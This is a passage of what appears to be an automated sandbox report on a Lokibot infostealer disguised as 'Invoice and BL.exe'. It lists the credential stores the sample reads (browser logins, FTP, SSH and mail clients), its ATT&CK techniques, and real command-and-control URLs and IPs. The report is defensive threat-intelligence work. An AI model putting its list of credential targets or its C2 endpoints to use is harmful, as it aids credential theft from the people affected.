            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00406069 GetUserNameW,7_2_00406069
            Source: C:\Users\user\Desktop\Invoice and BL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected LokibotShow sources
            Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Invoice and BL.exe PID: 1152, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5412, type: MEMORYSTR
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
            Tries to steal Mail credentials (via file access)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
            Tries to steal Mail credentials (via file registry)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: PopPassword7_2_0040D069
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: SmtpPassword7_2_0040D069
            Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management InstrumentationPath InterceptionAccess Token Manipulation1Masquerading1OS Credential Dumping2Security Software Discovery121Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection211Disable or Modify Tools1Credentials in Registry2Process Discovery1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Access Token Manipulation1NTDSAccount Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol212SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection211LSA SecretsSystem Owner/User Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information3DCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing11Proc FilesystemSystem Information Discovery13Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Invoice and BL.exe59%VirustotalBrowse
            Invoice and BL.exe34%MetadefenderBrowse
            Invoice and BL.exe61%ReversingLabsByteCode-MSIL.Infostealer.PrimaryPass
            Invoice and BL.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            7.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            0.2.Invoice and BL.exe.397e408.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File

            Domains

            SourceDetectionScannerLabelLink
            abixmaly.duckdns.org10%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://alphastand.top/alien/fre.php0%URL Reputationsafe
            http://www.ibsensoftware.com/0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://alphastand.win/alien/fre.php0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://alphastand.trade/alien/fre.php0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://abixmaly.duckdns.org/binge/fre.php13%VirustotalBrowse
            http://abixmaly.duckdns.org/binge/fre.php0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://abixmaly.duckdns.org/binge/fre.phpNg0%Avira URL Cloudsafe
            http://www.sakkal.com0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            abixmaly.duckdns.org
            		192.169.69.26
            		truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://kbfvzoboss.bid/alien/fre.phptrue
            • URL Reputation: safe
            		unknown
            http://alphastand.top/alien/fre.phptrue
            • URL Reputation: safe
            		unknown
            http://alphastand.win/alien/fre.phptrue
            • URL Reputation: safe
            		unknown
            http://alphastand.trade/alien/fre.phptrue
            • URL Reputation: safe
            		unknown
            http://abixmaly.duckdns.org/binge/fre.phptrue
            • 13%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.apache.org/licenses/LICENSE-2.0Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
              		high
              http://www.fontbureau.comInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                		high
                http://www.fontbureau.com/designersGInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.com/designers/?Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                    		high
                    http://www.founder.com.cn/cn/bTheInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers?Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                      		high
                      http://www.ibsensoftware.com/RegSvcs.exe, RegSvcs.exe, 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.tiro.comInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designersInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                        		high
                        http://www.goodfont.co.krInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.carterandcone.comlInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.sajatypeworks.comInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.typography.netDInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers/cabarga.htmlNInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                          		high
                          http://www.founder.com.cn/cn/cTheInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.galapagosdesign.com/staff/dennis.htmInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://fontfabrik.comInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.founder.com.cn/cnInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers/frere-jones.htmlInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                            		high
                            http://www.jiyu-kobo.co.jp/Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.galapagosdesign.com/DPleaseInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers8Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                              		high
                              http://www.fonts.comInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                                		high
                                http://www.sandoll.co.krInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.urwpp.deDPleaseInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.zhongyicts.com.cnInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://abixmaly.duckdns.org/binge/fre.phpNgRegSvcs.exe, 00000007.00000002.294755116.0000000000F48000.00000004.00000020.sdmptrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.sakkal.comInvoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                192.169.69.26
                                		abixmaly.duckdns.orgUnited States
                                		23033WOWUStrue

                                General Information

                                Joe Sandbox Version:33.0.0 White Diamond
                                Analysis ID:458970
                                Start date:03.08.2021
                                Start time:23:24:19
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 6m 43s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:Invoice and BL.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:22
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@3/3@3/1
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 97.1% (good quality ratio 93%)
                                • Quality average: 76.7%
                                • Quality standard deviation: 28.9%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 84
                                • Number of non-executed functions: 21
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                • Excluded IPs from analysis (whitelisted): 168.61.161.212, 40.88.32.150, 52.147.198.201, 20.82.210.154, 23.211.4.86, 40.112.88.60, 13.107.4.50, 51.103.5.159, 80.67.82.235, 80.67.82.211, 20.49.157.6
                                • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, elasticShed.au.au-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, Edge-Prod-FRAr4a.env.au.au-msedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, afdap.au.au-msedge.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, au.au-msedge.net, blobcollector.events.data.trafficmanager.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, au.c-0001.c-msedge.net
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                23:25:50API Interceptor1x Sleep call for process: RegSvcs.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                192.169.69.26Samples and listed Products.exeGet hashmaliciousBrowse
                                • abixmaly.duckdns.org/binge/fre.php
                                Bank Payment Transfer for PI. BT-GJ21001 (our PO. 2100002(R).exeGet hashmaliciousBrowse
                                • abixmaly.duckdns.org/binge/fre.php
                                MglhrJiLUL.exeGet hashmaliciousBrowse
                                • 195.245.112.115/index.php
                                On35KJkYT4.exeGet hashmaliciousBrowse
                                • 195.245.112.115/index.php
                                Order_List.xlsxGet hashmaliciousBrowse
                                • dubaisupport.duckdns.org/file.exe

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                abixmaly.duckdns.orgSamples and listed Products.exeGet hashmaliciousBrowse
                                • 192.169.69.26
                                Bank Payment Transfer for PI. BT-GJ21001 (our PO. 2100002(R).exeGet hashmaliciousBrowse
                                • 192.169.69.26
                                remittance for USD 8,752.16.exeGet hashmaliciousBrowse
                                • 35.246.120.60
                                invoice for your ref.exeGet hashmaliciousBrowse
                                • 35.246.120.60
                                PTI invoice of oc 4f -36..exeGet hashmaliciousBrowse
                                • 35.246.120.60
                                contract YF8536851-1.exeGet hashmaliciousBrowse
                                • 35.246.120.60
                                GPxOawyspo.exeGet hashmaliciousBrowse
                                • 35.246.120.60
                                bank transfer SWIFT.exeGet hashmaliciousBrowse
                                • 35.246.120.60

                                ASN

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                WOWUSSamples and listed Products.exeGet hashmaliciousBrowse
                                • 192.169.69.26
                                Bank Payment Transfer for PI. BT-GJ21001 (our PO. 2100002(R).exeGet hashmaliciousBrowse
                                • 192.169.69.26
                                PO20171118-COGRAL SPA.jarGet hashmaliciousBrowse
                                • 192.169.69.25
                                New Order_R4.jarGet hashmaliciousBrowse
                                • 192.169.69.25
                                8MglQ6WLl5.exeGet hashmaliciousBrowse
                                • 45.14.115.62
                                QPqcGLFnyI.exeGet hashmaliciousBrowse
                                • 192.169.69.30
                                Payment Slip.xlsbGet hashmaliciousBrowse
                                • 192.169.69.25
                                AFE7D487324952929F8F037BDFBD7249049086FC8C4A9.exeGet hashmaliciousBrowse
                                • 192.169.69.25
                                10FCF8DA6000E34F9E8B8B173B6F8A65B6128E2422DB5.exeGet hashmaliciousBrowse
                                • 192.169.69.25
                                IMG_Giris emri 20201122164730_PDF.exeGet hashmaliciousBrowse
                                • 192.169.69.25
                                ORDER-21611docx.exeGet hashmaliciousBrowse
                                • 192.169.69.25
                                4714D68DBB9F9AC36425F2EC73ED434CF57407F36063C.exeGet hashmaliciousBrowse
                                • 192.169.69.25
                                ORDER-6010.pdf.exeGet hashmaliciousBrowse
                                • 192.169.69.25
                                9CCC5F07D0BF7152841C893C892DF407C854D5FF45C1A.exeGet hashmaliciousBrowse
                                • 192.169.69.26
                                0F4F0709D120ABA22D4687BFABFA5004DD54B0FCC6EF1.exeGet hashmaliciousBrowse
                                • 192.169.69.25
                                WNr7kU4wSU.exeGet hashmaliciousBrowse
                                • 192.169.69.26
